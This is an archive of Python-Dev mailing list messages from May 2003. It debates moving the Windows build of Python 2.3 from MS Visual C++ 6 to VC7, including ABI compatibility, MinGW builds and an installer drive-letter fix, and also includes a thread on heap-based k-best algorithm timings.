>> Visual Studio 2003 came out a few weeks ago.  I honestly don't know if 
>> its considered VC8 or just VC7.1 with the same backend compilers.  But if 
>> you're going to upgrad, you might as well go all the way.
>
> Good question.
>
>> Also, I'm assuming 2.3 will still be compiled on 6.0, right?
>
> Hm, I was thinking that 2.3 final could be built using 7.x if Nick can
> get us the donated copies fast enough.

If this means that those of us with VC6, and with no plans/reasons to
upgrade can no longer build our own extensions, this would be a
disaster.

Surely VC7-compiled C programs can be built in such a way as to be
link-compatible with VC6-compiled extensions??? (Wait, this is
Microsoft...)

Please *don't* build 2.3 final with VC7. If you're going to switch,
give users more warning, and test builds - I would need at least to
find out if I could build extensions against a VC7-compiled Python
using mingw...

Paul.
-- 
This signature intentionally left blank


From lists@morpheus.demon.co.uk  Tue May  6 22:20:32 2003
From: lists@morpheus.demon.co.uk (Paul Moore)
Date: Tue, 06 May 2003 22:20:32 +0100
Subject: [Python-Dev] MS VC 7 offer
References: <200305061948.03757.phil@riverbankcomputing.co.uk> <BIEJKCLHCIOIHAGOKOLHCEIAFJAA.tim.one@comcast.net>
Message-ID: <n2m-g.n0hzn55r.fsf@morpheus.demon.co.uk>

Tim Peters <tim.one@comcast.net> writes:

> [Phil Thompson]
>> How do we get hold of the free VC 7 compilers?
>
> Part of the 100+ MB .NET Framework 1.1 SDK:
>
> http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx
>
> Note that this requires Win2K minimum.

Note that these have no optimiser, as I understand it.

Paul.
-- 
This signature intentionally left blank


From martin@v.loewis.de  Tue May  6 22:45:28 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Tue, 06 May 2003 23:45:28 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <008601c31414$a26d0120$21795418@dell1700>
References: <008601c31414$a26d0120$21795418@dell1700>
Message-ID: <3EB82CF8.4030005@v.loewis.de>

Brian Quinlan wrote:

> Wouldn't this only affect extension modules using PyFile_FromFile and
> PyFile_AsFile? 

That might be the case. However, notice that there might be other 
incompatibilities which we might discover by chance only - Microsoft 
hasn't documented any of this.

>>There won't be any. That's any ABI change.
> 
> 
> Isn't the ABI dependant on the API and linker? 

And the compiler, and the operating system, and the microprocessor.


> The API is supposed to be
> stable at this point. I would imagine that most extension developers
> would assume that the build environment is also stable at this point.

Yes, some are certainly assuming that. Some are sincerely hoping,
or even expecting, that Python 2.3 is released with VC7, so that they 
can embed Python in their VC7-based application without having to 
recompile it.

No matter what the choice is, somebody will be unhappy.

Regards,
Martin




From dave@boost-consulting.com  Tue May  6 23:01:28 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Tue, 06 May 2003 18:01:28 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB81A8B.9090603@v.loewis.de> (Martin v.
 =?iso-8859-1?q?L=F6wis's?= message of "Tue, 06 May 2003 22:26:51 +0200")
References: <007f01c31409$3a5f9670$21795418@dell1700>
 <200305062212.07539.aleax@aleax.it> <3EB81A8B.9090603@v.loewis.de>
Message-ID: <u65on20qv.fsf@boost-consulting.com>

"Martin v. L=F6wis" <martin@v.loewis.de> writes:

> Alex Martelli wrote:
>
>> When we discussed VC versions (back when we met in Ofxord during
>> PythonUK/ACCU), David Abrahams seemed adamant that VC7 and VC6
>> are indeed compatible
>
> I doubt he said this in this generality

Actually, I did.  I may have overstated the case slightly, but not by
much.

> he surely knows that you cannot mix C++ objects files on the object
> file level between those compilers, as they implement completely
> different ABIs.

They implement substantially similar ABIs.  Here are the facts in
full, glorious/gory detail from a member of Microsoft's compiler team.
I quote:

    The bottom line: the ABI is backwards compatible.

    We do require using the linker that matches the newest compiler
    used in a set of .obj files.

    There were some incompatible name decoration changes (function
    templates) b/w VC7 and VC7.1.  Most people should never notice
    this one, though I know of at least 1 customer that did.

    Another name decoration change was made b/w VC6 and VC7, but
    nobody should notice that change, since they were hitting a broken
    construct anyway.

    There was a SP of VC6 that is incompatible with VC7 and other
    builds of VC6, I forget which exactly, maybe SP4, or maybe it was
    the processor pack.  It only involved pointer to members, but we
    were layout incompatible.

    The only other issues I can think of are related to
    __declspec(align(N)) and __unaligned (IA64 only, really.)

> For Python, the biggest problem is that you cannot pass FILE* from
> one C library to the other, because of some stupid locking test in
> the C library. This does cause crashes when you try to use Python
> extension modules compiled with the wrong compiler.

Assuming you are passing availability of FILE*s across the extension
module boundary and the extension module author is using the VC7
libraries instead of those that ship with VC6 (using the VC6 libraries
with VC7 would be a trick)... then yes.

In practice, making sure that resources are only used by the
appropriate 'C' library is not too difficult, but requires a level of
attention that I wouldn't want to demand of newbies.  I certainly
build all kinds of Boost.Python extension modules with VC7 and test
them without problems using a VC6 build of Python.

HTH,
--=20
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From guido@python.org  Tue May  6 23:06:11 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 06 May 2003 18:06:11 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 22:19:31 BST."
 <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net> <200305061901.h46J11306259@odiug.zope.com>
 <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>
Message-ID: <200305062206.h46M6BP08306@odiug.zope.com>

> If this means that those of us with VC6, and with no plans/reasons to
> upgrade can no longer build our own extensions, this would be a
> disaster.

Part of the offer was:

| Potentially we can even figure out how to enable anyone to
| build Python using the freely downloadable compilers I mentioned
| above...

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@v.loewis.de  Tue May  6 23:17:14 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Wed, 07 May 2003 00:17:14 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net> <200305061901.h46J11306259@odiug.zope.com> <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>
Message-ID: <3EB8346A.1000907@v.loewis.de>

Paul Moore wrote:
> If this means that those of us with VC6, and with no plans/reasons to
> upgrade can no longer build our own extensions, this would be a
> disaster.

Using VC7 would be a desaster for those required to use VC6. Using VC6 
is a desaster for those required to use VC7. Somebody will be unhappy.

> Surely VC7-compiled C programs can be built in such a way as to be
> link-compatible with VC6-compiled extensions??? 

It probably works in many cases, but it is known to fail in certain cases.

Regards,
Martin



From tim.one@comcast.net  Tue May  6 23:17:22 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 18:17:22 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB82CF8.4030005@v.loewis.de>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>

[Martin v. Lowis]
> ...
> Some are sincerely hoping, or even expecting, that Python 2.3 is
> released with VC7, so that they can embed Python in their VC7-based
> application without having to recompile it.
>
> No matter what the choice is, somebody will be unhappy.

OTOH, I don't see anything to stop releasing VC6 and VC7 versions of Python,
except for the absence of a volunteer to do it.  While the Wise installer is
proprietary, there's nothing hidden about what goes into a release, there
are several free installers people *could* use instead, and the build
process for the 3rd-party components is pretty exhaustively documented.

Speaking of which, presumably Tcl/Tk and SSL and etc on Windows should also
be compiled under VC7 then.



From cnetzer@mail.arc.nasa.gov  Tue May  6 23:37:30 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 06 May 2003 15:37:30 -0700
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305062206.h46M6BP08306@odiug.zope.com>
References: <Pine.LNX.4.44.0305061347360.3480-100000@oblivion.cathoderaymission.net>
 <200305061901.h46J11306259@odiug.zope.com>
 <n2m-g.ptmvn57g.fsf@morpheus.demon.co.uk>
 <200305062206.h46M6BP08306@odiug.zope.com>
Message-ID: <1052260650.529.14.camel@sayge.arc.nasa.gov>

On Tue, 2003-05-06 at 15:06, Guido van Rossum wrote:

> Part of the offer was:
> 
> | Potentially we can even figure out how to enable anyone to
> | build Python using the freely downloadable compilers I mentioned
> | above...

Which would seem to exclude building on Win98 machines (or WinME
*snort*, or even Win NT 4).  Those platforms still have a huge installed
base, and I would assume a not insignificant developer base.

Is offering a MSVC6 version along with a more recent compiler version an
option?

-- 

Chad Netzer
(any opinion expressed is my own and not NASA's or my employer's)



From martin@v.loewis.de  Tue May  6 23:47:01 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Wed, 07 May 2003 00:47:01 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <u65on20qv.fsf@boost-consulting.com>
References: <007f01c31409$3a5f9670$21795418@dell1700>	<200305062212.07539.aleax@aleax.it> <3EB81A8B.9090603@v.loewis.de> <u65on20qv.fsf@boost-consulting.com>
Message-ID: <3EB83B65.8070900@v.loewis.de>

David Abrahams wrote:

> Actually, I did.  I may have overstated the case slightly, but not by
> much.

Hmm. While this is certainly off-topic for python-dev, I'm still 
curious. So I just did this:

1. Create a library project with VC6. Put a single class into
    a single translation unit

#include <afx.h>

struct X:public CObject{
    X();
};

2. Compile this library with vc6.

3. Create an MFC application with VC7. Instantiate X somewhere.
    Try to link. This gives the error message

LINK : fatal error LNK1104: cannot open file 'mfc42d.lib'

Sure enough, VC7 does not come with that library.
So it seems very clear to me that the libraries shipped are
incompatible in a way that does not allow to mix object files
of different compilers. Did I do something wrong here?

Regards,
Martin




From martin@v.loewis.de  Tue May  6 23:50:44 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Wed, 07 May 2003 00:50:44 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHEEJKFJAA.tim.one@comcast.net>
Message-ID: <3EB83C44.20706@v.loewis.de>

Tim Peters wrote:

> Speaking of which, presumably Tcl/Tk and SSL and etc on Windows should also
> be compiled under VC7 then.

That is certainly the case (not to forget bsddb, zlib, and bzip2).
This will require quite some volunteer time.

Regards,
Martin




From dave@boost-consulting.com  Wed May  7 00:05:41 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Tue, 06 May 2003 19:05:41 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB83B65.8070900@v.loewis.de> (Martin v.
 =?iso-8859-1?q?L=F6wis's?= message of "Wed, 07 May 2003 00:47:01 +0200")
References: <007f01c31409$3a5f9670$21795418@dell1700>
 <200305062212.07539.aleax@aleax.it> <3EB81A8B.9090603@v.loewis.de>
 <u65on20qv.fsf@boost-consulting.com> <3EB83B65.8070900@v.loewis.de>
Message-ID: <un0hzznei.fsf@boost-consulting.com>

"Martin v. L=F6wis" <martin@v.loewis.de> writes:

> David Abrahams wrote:
>
>> Actually, I did.  I may have overstated the case slightly, but not by
>> much.
>
> Hmm. While this is certainly off-topic for python-dev, I'm still
> curious. So I just did this:
>
> 1. Create a library project with VC6. Put a single class into
>     a single translation unit
>
> #include <afx.h>
>
> struct X:public CObject{
>     X();
> };
>
> 2. Compile this library with vc6.
>
> 3. Create an MFC application with VC7. Instantiate X somewhere.
>     Try to link. This gives the error message
>
> LINK : fatal error LNK1104: cannot open file 'mfc42d.lib'
>
> Sure enough, VC7 does not come with that library.
> So it seems very clear to me that the libraries shipped are
> incompatible in a way that does not allow to mix object files
> of different compilers. Did I do something wrong here?

I normally don't think of the contents (or naming) of a non-standard
library like MFC that just happens to ship with the compiler as being
something that affects object-code compatibility.  *If* you accept the
way I see that term, your test doesn't say anything about it.
Certainly for any accepted definition of "ABI", it's hard to connect
your test with the claim that "they implement completely different
ABIs".

You could make a reasonable argument that differences in the standard
'C' or C++ library affects object code compatibility; frankly I have
avoided that area so I don't know whether there are problems with the
'C' library but I know the C++ library underwent a major overhaul, so
I wouldn't place any bets.

Regardless, when I say "object code compatibility", I'm talking about
what's traditionally thought of as the ABI: the layout of objects,
calling convention, mechanics of the runtime, etc., all of which are
basically library-independent issues.

HTH2,
--=20
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From mhammond@skippinet.com.au  Wed May  7 00:06:38 2003
From: mhammond@skippinet.com.au (Mark Hammond)
Date: Wed, 7 May 2003 09:06:38 +1000
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <03dc01c31424$26758500$530f8490@eden>

[Guido]

> I can see advantages and disadvantages of moving to VC 7; I'm sure the
> VC 7 compiler is more standard-compliant and generates faster code,
> but a disadvantage is that you can't apparently link binaries built
> with VC 6 to a program built with VC 7, meaning that 3rd party
> extensions will have to be recompiled with VC 7 as well.

Actually, I think this need not be true.  I have MSVC7, not currently
installed, but when it was I did manage to mix and match compilers for
Python and extensions without problem.

I am happy to play with this, but am short on time for a week or so.

Another thing to consider is the "make" environment.  If we don't use
DevStudio, then presumably our existing project files will become useless.
Not a huge problem, but a real one.  MSVC exported makefiles are not
designed to be maintained.  I'm having good success with autoconf and Python
on other projects, but that would raise the barrier to including cygwin in
your build environment.

Then-just-one-step-from-gcc <wink> ly,

Mark.



From mhammond@skippinet.com.au  Wed May  7 00:19:50 2003
From: mhammond@skippinet.com.au (Mark Hammond)
Date: Wed, 7 May 2003 09:19:50 +1000
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB83B65.8070900@v.loewis.de>
Message-ID: <03e201c31425$feeb3a00$530f8490@eden>

> > Actually, I did.  I may have overstated the case slightly,
> but not by
> > much.
>
> Hmm. While this is certainly off-topic for python-dev, I'm still
> curious. So I just did this:

What you did is to create a library using a specific version of an
"external" library (MFC - shipped with MS as part of MSVC, but as external
as any other .lib you may use from anywhere)

You then upgrade to a newer version of the library, and attempted to link
code built using an earlier one.

So this has nothing to do with MSVC as such, only with MFC.  It is somewhat
similar to trying to use a Python 1.x extension with Python 2.x, or,
assuming it was possible, using the same MSVCx with 2 discrete MFC versions.

Mark.



From phil@riverbankcomputing.co.uk  Wed May  7 00:46:06 2003
From: phil@riverbankcomputing.co.uk (Phil Thompson)
Date: Wed, 7 May 2003 00:46:06 +0100
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHCEIAFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHCEIAFJAA.tim.one@comcast.net>
Message-ID: <200305070046.06725.phil@riverbankcomputing.co.uk>

On Tuesday 06 May 2003 7:56 pm, Tim Peters wrote:
> [Phil Thompson]
>
> > How do we get hold of the free VC 7 compilers?
>
> Part of the 100+ MB .NET Framework 1.1 SDK:
>
> http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx
>
> Note that this requires Win2K minimum.

Does it generate binaries that will run under Win9x?

Phil


From pje@telecommunity.com  Wed May  7 00:52:39 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Tue, 06 May 2003 19:52:39 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <03dc01c31424$26758500$530f8490@eden>
References: <200305061826.h46IQ7605750@odiug.zope.com>
Message-ID: <5.1.1.6.0.20030506194806.01fc05b0@telecommunity.com>

At 09:06 AM 5/7/03 +1000, Mark Hammond wrote:
>Another thing to consider is the "make" environment.  If we don't use
>DevStudio, then presumably our existing project files will become useless.
>Not a huge problem, but a real one.  MSVC exported makefiles are not
>designed to be maintained.  I'm having good success with autoconf and Python
>on other projects, but that would raise the barrier to including cygwin in
>your build environment.
>
>Then-just-one-step-from-gcc <wink> ly,

Just out of curiosity, what is it that MSVC adds to the picture over gcc 
anyway?  Has anybody ever tried making a MinGW-only build of Python on Windows?



From phil@riverbankcomputing.co.uk  Wed May  7 00:57:10 2003
From: phil@riverbankcomputing.co.uk (Phil Thompson)
Date: Wed, 7 May 2003 00:57:10 +0100
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <007e01c31405$1ea52fc0$21795418@dell1700>
References: <007e01c31405$1ea52fc0$21795418@dell1700>
Message-ID: <200305070057.10872.phil@riverbankcomputing.co.uk>

On Tuesday 06 May 2003 8:24 pm, Brian Quinlan wrote:
> > I can see the downside (next to no experience with 7.x, and perhaps
>
> none
>
> > before the final release).  What's the upside?
>
> It's free and more standards compliant.

This is what I'm struggling with.

If it's free, why pay any attention to the offer of a donation of a GUI 
frontend? (With a certain amount of irony, I don't attach any value to a GUI 
frontend to a compiler.)

If it is free using some Microsoft definition of the word (eg. users have to 
upgrade to Win2K, or some other "read the small print" reason) then my vote 
is -1.

If it is really free then submit a PEP and factor it in to the normal 
review/development process.

I don't understand the apparent urgency.

Phil


From mhammond@skippinet.com.au  Wed May  7 01:08:25 2003
From: mhammond@skippinet.com.au (Mark Hammond)
Date: Wed, 7 May 2003 10:08:25 +1000
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <5.1.1.6.0.20030506194806.01fc05b0@telecommunity.com>
Message-ID: <03f801c3142c$c8603290$530f8490@eden>

> Just out of curiosity, what is it that MSVC adds to the
> picture over gcc
> anyway?  Has anybody ever tried making a MinGW-only build of
> Python on Windows?

Now or then? <wink>.  "Then" it was the simple matter of no gcc available
for Windows.  Now, it is a combination of no one driving it, and the simple
fact that msvc will almost certainly generate better code and work with
almost every library on Windows worth talking to.  However, until the "no
one driving it" part of solved, the latter, including the impact of mingw,
wont be able to be measured.

Mark.



From gh@ghaering.de  Wed May  7 01:31:04 2003
From: gh@ghaering.de (=?ISO-8859-1?Q?Gerhard_H=E4ring?=)
Date: Wed, 07 May 2003 02:31:04 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <5.1.1.6.0.20030506194806.01fc05b0@telecommunity.com>
References: <200305061826.h46IQ7605750@odiug.zope.com>
 <5.1.1.6.0.20030506194806.01fc05b0@telecommunity.com>
Message-ID: <3EB853C8.70100@ghaering.de>

Phillip J. Eby wrote:
> Just out of curiosity, what is it that MSVC adds to the picture over gcc 
> anyway?  Has anybody ever tried making a MinGW-only build of Python on 
> Windows?

I'm working (as time and enthusiasm permits) on making this happen. For 
this project, I even got commit privileges by the powers that be :-)

Getting as far as:

C:\src\python\dist\src>python
'import site' failed; use -v for traceback
Python 2.3a2+ (#27, Apr 23 2003, 21:13:49)
[GCC 3.2.2 (mingw special 20030208-1)] on mingw32_nt-5.11
Type "help", "copyright", "credits" or "license" for more information.
 >>>

isn't much of a problem. This is a statically linked python.exe built 
with the autoconf-based build process, msys, mingw and my patches, 
mostly for posixmodule.c.

The difficult part is figuring out the autoconf stuff and distutils, so 
that the rest of the modules can be built. I didn't get very far on this 
side, yet :-/

<OT>
OTOH I'm pretty sure that a mingw build would be much easier if I just 
wrote my own Makefiles, but that's probably unlikely to ever be merged. 
At least that was my experience when making PostgreSQL's client code 
compile with mingw.

Their answer was "we don't want to maintain yet anothe set of 
proprietary Makefiles", which is a good argument.
</OT>

-- Gerhard


From tim.one@comcast.net  Wed May  7 01:43:59 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 20:43:59 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305070046.06725.phil@riverbankcomputing.co.uk>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEBMEFAB.tim.one@comcast.net>

[Phil Thompson, on
  http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx
]

Follow the link, please.  I haven't tried it myself, and you've already
proved you can read too <wink>.



From skip@pobox.com  Wed May  7 01:52:13 2003
From: skip@pobox.com (Skip Montanaro)
Date: Tue, 6 May 2003 19:52:13 -0500
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB853C8.70100@ghaering.de>
References: <200305061826.h46IQ7605750@odiug.zope.com>
 <5.1.1.6.0.20030506194806.01fc05b0@telecommunity.com>
 <3EB853C8.70100@ghaering.de>
Message-ID: <16056.22717.877383.95261@montanaro.dyndns.org>

    Gerhard> OTOH I'm pretty sure that a mingw build would be much easier if
    Gerhard> I just wrote my own Makefiles, but that's probably unlikely to
    Gerhard> ever be merged.  At least that was my experience when making
    Gerhard> PostgreSQL's client code compile with mingw.

I suggest you go ahead with whatever is easiest for you.  At least you will
be able to focus on actually solving the MinGW-related problems.  Others can
chip in on the autoconf problems.  As a starter perhaps a Makefile.mingw
file can be added to the PCBuild directory.  At a later date the interim
makefile can be removed to the attic.

Skip




From tim.one@comcast.net  Wed May  7 02:17:49 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 21:17:49 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305070057.10872.phil@riverbankcomputing.co.uk>
Message-ID: <LNBBLJKPBEHFEDALKOLCCECCEFAB.tim.one@comcast.net>

[Phil Thompson]
> ...
> If it's free, why pay any attention to the offer of a donation of a GUI
> frontend? (With a certain amount of irony, I don't attach any
> value to a GUI frontend to a compiler.)

The GUI isn't just the compiler, it's also the automated dependency
analysis, a make system, and a (very good) debugger.

> If it is free using some Microsoft definition of the word (eg.
> users have to upgrade to Win2K, or some other "read the small print"
> reason) then my vote is -1.

Guido asked who would want one.  You don't, but you don't get to vote that
nobody else does either.



From BPettersen@NAREX.com  Wed May  7 02:21:11 2003
From: BPettersen@NAREX.com (Bjorn Pettersen)
Date: Tue, 6 May 2003 19:21:11 -0600
Subject: [Python-Dev] Windows installer request...
Message-ID: <60FB8BB7F0EFC7409B75EEEC13E20192022DE2A8@admin56.narex.com>

> From: Tim Peters [mailto:tim.one@comcast.net]=20
>=20
> [Bjorn Pettersen]
[...]
> >  item: Get Environment Variable
> >    Variable=3DOSDRIVE
> >    Environment=3DSystemDrive
> >    Default=3DC:
> >  end
[...]

> Enough already <wink/frown>:  I don't have time to try=20
> umpteen different things here, or really even one.

Thank you for doing it anyway then <smile>.

> What I did do is build an installer *just* removing the hard-coded
> Wizard-generated "C:" prefix.  Martin tried that and said it=20
> worked for him. It doesn't hurt me.  If it works for you too,=20
> I'll commit the change:

Works like a charm. Tested on Win98, Win2k, WinXP Pro (regular), and my
"special" XP. (NT4 seems to have died a silent death, so I couldn't test
it there...)

> Please give that a try.  It's an incoherent mix if files, so=20
> please use a junk name for the installation directory and program=20
> startup group (or simply abort the install after you see whether=20
> it suggested a drive you approve of).

I went all the way through (all files seems to have gone in correctly),
and as expected it shadowed my original install of 2.3b1 in the
Add/Remove Programs window. Surprisingly however, the original came back
after this one was removed. Who'd have thought.. ;-)

[.. xx.wse needs the Wise GUI to create an installer..]

Thought it might be that way... FWIW, re: the MSVC7 debate, the
"Microsoft Development Environment" (DevStudio), comes with five
different "Setup and Deployment projects". I've never used any of them,
nor Wise (obviously :-), but it could potentially get you out of the
loop... <wink>.

Thanks again!

-- bjorn


From tim.one@comcast.net  Wed May  7 02:23:55 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 21:23:55 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB83C44.20706@v.loewis.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCEECDEFAB.tim.one@comcast.net>

[Tim]
> Speaking of which, presumably Tcl/Tk and SSL and etc on Windows
> should also be compiled under VC7 then.

[Martin v. L=F6wis]
> That is certainly the case (not to forget bsddb, zlib, and bzip2).
> This will require quite some volunteer time.

Amplifying a little, the Python code base required some changes befor=
e it
would compile under VC 7 (I didn't make these changes, and don't reca=
ll any
details apart from changes in MS's LONG_INTEGER APIs).  There's no re=
ason to
believe that other code bases are immune from needing changes too.  A=
t
present, we don't maintain any patches to any external code base in o=
rder to
build the Windows release.  If we needed to make changes to them for =
VC 7,
that would probably change, and should really be done by the packages=
'
primary (non-Python) maintainers.




From tim.one@comcast.net  Wed May  7 02:40:49 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 21:40:49 -0400
Subject: [Python-Dev] Windows installer request...
In-Reply-To: <60FB8BB7F0EFC7409B75EEEC13E20192022DE2A8@admin56.narex.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCECFEFAB.tim.one@comcast.net>

[Tim]
>> Enough already <wink/frown>:  I don't have time to try
>> umpteen different things here, or really even one.

[Bjorn Pettersen]
> Thank you for doing it anyway then <smile>.

You're welcome!  I took the "C:" out on Monday, when I had just enough spare
time to delete one byte, and took the rest out of sleep.

> ...
> Works like a charm. Tested on Win98, Win2k, WinXP Pro (regular), and my
> "special" XP. (NT4 seems to have died a silent death, so I couldn't test
> it there...)

Thanks!  I'll check it in ... Thursday.

>> Please give that a try.  It's an incoherent mix if files, so
>> please use a junk name for the installation directory and program
>> startup group (or simply abort the install after you see whether
>> it suggested a drive you approve of).

> I went all the way through (all files seems to have gone in correctly),
> and as expected it shadowed my original install of 2.3b1 in the
> Add/Remove Programs window. Surprisingly however, the original came back
> after this one was removed. Who'd have thought.. ;-)

The rollback features in Wise 8.14-generated installers are pretty good
(esp. if you check the "make backups" option when installing).
Uninstall/rollback will even restore start menu groups and file
associations.  I don't trust it enough to recommend it, though (I haven't
really beat on it).

Something fun to waste time:  in the very last "Installation Completed!"
install dialog, click "Cancel" instead of "Finish".  It will then roll back
all the changes it made, leaving things as they were before you started the
installer.

> ... FWIW, re: the MSVC7 debate, the "Microsoft Development Environment"
> (DevStudio), comes with five different "Setup and Deployment projects".
> I've never used any of them, nor Wise (obviously :-), but it could
> potentially get you out of the loop... <wink>.

Thanks, but I'm not sure even death has that kind of power.



From dave@boost-consulting.com  Wed May  7 03:16:25 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Tue, 06 May 2003 22:16:25 -0400
Subject: [Python-Dev] Re: MS VC 7 offer
References: <008601c31414$a26d0120$21795418@dell1700> <3EB82CF8.4030005@v.loewis.de>
Message-ID: <usmrry006.fsf@boost-consulting.com>

"Martin v. Löwis" <martin@v.loewis.de> writes:

> Brian Quinlan wrote:
>
>> Wouldn't this only affect extension modules using PyFile_FromFile and
>> PyFile_AsFile?
>
> That might be the case. However, notice that there might be other
> incompatibilities which we might discover by chance only - Microsoft
> hasn't documented any of this.

They pretty much told you the exact score, through me.  More details
are available if neccessary.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From dave@boost-consulting.com  Wed May  7 03:20:59 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Tue, 06 May 2003 22:20:59 -0400
Subject: [Python-Dev] Re: MS VC 7 offer
References: <16056.2317.124886.963460@montanaro.dyndns.org> <007e01c31405$1ea52fc0$21795418@dell1700>
Message-ID: <un0hzxzsk.fsf@boost-consulting.com>

Brian Quinlan <brian@sweetapp.com> writes:

>> I can see the downside (next to no experience with 7.x, and perhaps
> none
>> before the final release).  What's the upside?
>
> It's free and more standards compliant. 

That compliance means a lot to C++ programmers.  It takes MSVC from
being a real PITA to do any serious C++ in (Vc7.0 was worse than 6 in
some ways) to being a first-class contender among quality C++
implementations.

I'm not sure whether that should have any effect on decisions made
about Python development, though ;-)

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com



From tim.one@comcast.net  Wed May  7 03:42:29 2003
From: tim.one@comcast.net (Tim Peters)
Date: Tue, 06 May 2003 22:42:29 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <eppstein-4216E0.23002405052003@main.gmane.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCKECIEFAB.tim.one@comcast.net>

[David Eppstein]
>>> For fairness, it might be interesting to try another run of your test
>>> in which the input sequence is sorted in increasing order rather
>>> than random.

[Tim]
>> Comparing the worst case of one against the best case of the
>> other isn't my idea of fairness <wink>, but sure.

[David]
> Well, it doesn't seem any fairer to use random data to compare an
> algorithm with an average time bound that depends on an assumption of
> randomness in the data...anyway, the point was more to understand the
> limiting cases.  If one algorithm is usually 3x faster than the other,
> and is never more than 10x slower, that's better than being usually 3x
> faster but sometimes 1000x slower, for instance.

Sure.  In practice you need to know time distributions when using an
algorithm -- best, expected, worse, and how likely each are under a variety
of expected conditions.

> My Java KBest code was written to make data subsets for a half-dozen web
> pages (same data selected according to different criteria).  Of these
> six instances, one is presented the data in roughly ascending order, one
> in descending order, and the other four are less clear but probably not
> random.
>
> Robustness in the face of this sort of variation is why I prefer any
> average-case assumptions in my code's performance to depend only on
> randomness from a random number generator, and not arbitrariness in the
> actual input.  But I'm not sure I'd usually be willing to pay a 3x
> penalty for that robustness.

Most people aren't, until they hit a bad case <0.5 wink>.  So "pure"
algorithms rarely survive in the face of a large variety of large problem
instances.  The monumental complications Python's list.sort() endures to
work well under many conditions (both friendly and hostile) is a good
example of that.  In industrial real life, I expect an all-purpose N-Best
queue would need to take a hybrid approach, monitoring its fast-path gimmick
in some cheap way in order to fall back to a more defensive algorithm when
the fast-path gimmick isn't paying.

>> Here's a surprise:  I coded a variant of the quicksort-like
>> partitioning method, at the bottom of this mail.  On the largest-1000
>> of a million random-float case, times were remarkably steady across
>> trials (i.e., using a different set of a million random floats each
>> time):
>>
>> heapq                    0.96 seconds
>> sort (micro-optimized)   3.4  seconds
>> KBest (below)            2.6  seconds

> Huh.  You're almost convincing me that asymptotic analysis works even in
> the presence of Python's compiled-vs-interpreted anomalies.

Indeed, you can't fight the math!  It often takes a large problem for better
O() behavior to overcome a smaller constant in a worse O() approach, and
especially in Python.  For example, I once wrote and tuned and timed an O(N)
worst-case rank algorithm in Python ("find the k'th smallest item in a
sequence"), using the median-of-medians-of-5 business.  I didn't have enough
RAM at the time to create a list big enough for it to beat "seq.sort();
return seq[k]".  By playing lots of tricks, and boosting it to
median-of-medians-of-11, IIRC I eventually got it to run faster than sorting
on lists with "just" a few hundred thousand elements.

